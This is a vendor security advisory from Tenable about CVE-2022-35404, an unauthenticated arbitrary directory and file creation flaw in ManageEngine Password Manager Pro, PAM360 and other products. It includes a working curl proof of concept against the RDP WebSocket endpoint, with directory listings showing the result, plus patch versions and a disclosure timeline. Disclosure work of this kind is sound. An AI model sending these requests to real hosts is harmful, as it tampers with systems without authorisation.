Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

ManageEngine Multiple Products Remote Directory/File Creation

Medium

Synopsis

Tenable found a vulnerability in ManageEngine Password Manager Pro (PMP) build 12007 that allows an unauthenticated remote attacker to create arbitrary directories and a large number of small-sized files on the PMP host.

POC:

# Use different server parameters to create different directories
curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\path\dir1\aaa&width=1440&height=788'

curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp>:7273/RDP?server=c:\some\path\dir2\aaa&width=1440&height=788'

curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\path\dir3\aaa&width=1440&height=788'

C:\Users\Administrator>dir /S /B c:\some\path
c:\some\path\dir1
c:\some\path\dir2
c:\some\path\dir3
c:\some\path\dir1\aaa.rdpv
c:\some\path\dir2\aaa.rdpv
c:\some\path\dir3\aaa.rdpv


# Use repeat runs to create multiple separate rdpv files in the same directory
curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\dir\aaa&width=1440&height=788'

curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\dir\aaa&width=1440&height=788'

curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\dir\aaa&width=1440&height=788'

C:\Users\Administrator>dir c:\some\dir\
 Volume in drive C has no label.
 Volume Serial Number is A453-987D

 Directory of c:\some\dir

05/10/2022  09:53 PM    <DIR>          .
05/10/2022  09:53 PM    <DIR>          ..
05/10/2022  09:53 PM                64 aaa.rdpv
05/10/2022  09:53 PM                64 aaa_1.rdpv
05/10/2022  09:53 PM                64 aaa_2.rdpv

Note that this vulnerability also applies to ManageEngine PAM360 (on https port 8283) and possibly other ManageEngine products.

Solution

Apply appropriate patch per vendor recommendations.

Fixed versions for products known to be affected include:

  • ManageEngine Password Manager Pro Version 12.1 build 12101
  • ManageEngine PAM360 Version 5.5 build 5510
  • ManageEngine Access Manager Plus Version 4.3 build 4303
  • ManageEngine OpManager Version 12.6 build 126101
  • ManageEngine OpManager Version 12.5 build 125639

Disclosure Timeline

May 11, 2022 - Vulnerability discovered
May 20, 2022 - Vulnerability reported to vendor
May 21, 2022 - Vendor confirmed receipt of report
June 15, 2022 - Tenable asked vendor for update
June 16, 2022 - Vendor confirmed their team is working on the issue and noted that a few other products are also affected and are being worked on
June 16, 2022 - Tenable asked which other products are known to be affected
June 20, 2022 - Vendor stated a few of their ITOM products are also affected and their teams are working on it
June 23-24, 2022 - Vendor released patches for several products to address the vulnerability
July 1, 2022 - Vendor notified Tenable that patches were released
July 6, 2022 - Tenable requested CVE and vendor advisory information
July 6, 2022 - Vendor replied that a CVE has been requested and will be published once assigned

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2022-35404
Tenable Advisory ID: TRA-2022-25
CVSSv3 Base / Temporal Score:
5.3 / 4.9
CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C
Affected Products:
ManageEngine Password Manager Pro < Version 12.1 build 12101
ManageEngine PAM360 < Version 5.5 build 5510
ManageEngine Access Manager Plus < Version 4.3 build 4303
ManageEngine OpManager 12.6 < build 126101
ManageEngine OpManager 12.5 < build 125639
ManageEngine Network Configuration Manager 12.6 < build 126101
ManageEngine Network Configuration Manager 12.5 < build 125639
ManageEngine NetFlow Analyzer 12.6 < build 126101
ManageEngine NetFlow Analyzer 12.5 < build 125639
ManageEngine Firewall Analyzer 12.6 < build 126101
ManageEngine Firewall Analyzer 12.5 < build 125639
Risk Factor:
Medium

Advisory Timeline

July 6, 2022 - Initial release
July 7, 2022 - Added reference links
July 13, 2022 - Added CVE
July 26, 2022 - Added vendor advisory links and additional affected products